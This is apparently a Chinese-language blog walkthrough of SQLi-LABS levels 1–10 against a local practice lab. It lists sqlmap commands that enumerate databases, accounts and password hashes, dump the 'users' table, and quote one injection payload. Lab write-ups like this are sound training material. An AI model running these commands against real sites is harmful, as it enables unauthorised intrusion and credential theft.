sqlmap过SQLi-LABS靶场 1-10关

今天我们来用sqlmap去做SQLi-LABS靶场
首先来讲一下基础命令
1.清除sqlmap缓存:
第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容
第二个办法:sqlmap.py --purge
2.sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 –batch 自动输入
暴库
sqlmap -u 注入点 –dbs //暴库
Web当前使用的数据库
sqlmap -u 注入点 –current-db //爆当前使用的库
Web数据库使用的账户
sqlmap -u 注入点 –current-user //当前使用的账户
列出sqlserver所有用户
sqlmap -u 注入点 –users // 列出所有使用过的账户
数据库账户与密码
sqlmap -u 注入点 –passwords //mysql的登录账户和密码
列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables //(-D指定数据库名称)
列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 –columns
爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword” –dump (将结果导出)
–risk:风险等级,共有4个,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。

level:共有五个等级,默认为1,在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。

第一关
sqlmap过SQLi-LABS靶场 1-10关_第1张图片
先准备sqlmap
找到注入的,进行最高等级的爆库,很顺利

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbs

sqlmap过SQLi-LABS靶场 1-10关_第2张图片
在这里插入图片描述
找到数据库类型和确定有注入点可利用
全部数据库也爆出来了
sqlmap过SQLi-LABS靶场 1-10关_第3张图片
sqlmap过SQLi-LABS靶场 1-10关_第4张图片
查看我们现在所在的数据库 --current-db

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql --current-db

sqlmap过SQLi-LABS靶场 1-10关_第5张图片
然后我们查看数据库中的表–table

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" --table

sqlmap过SQLi-LABS靶场 1-10关_第6张图片
users表中应该有我们想要的,获取字段–col

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" --col

sqlmap过SQLi-LABS靶场 1-10关_第7张图片
显示我们想要的字段 --dump

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump

sqlmap过SQLi-LABS靶场 1-10关_第8张图片
拿下数据库

第二关

删除上次的缓存 --purge
和第一关一模一样,

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --leve=5 --risk=3 --dbs

第三关
一模一样,没难度

第四关
一模一样
工具用的
id=1") AND 2038=2039 AND (“VLST”="VLST

第5关
一般的不行
跑到这里点yes就行了
在这里插入图片描述

第六关
和第5关一模一样

第七关
一模一样

第八关
一模一样

第九关
一样

第十关
一样

总结一句sqlmap NB

你可能感兴趣的:(SQLmap,SQL注入,靶场)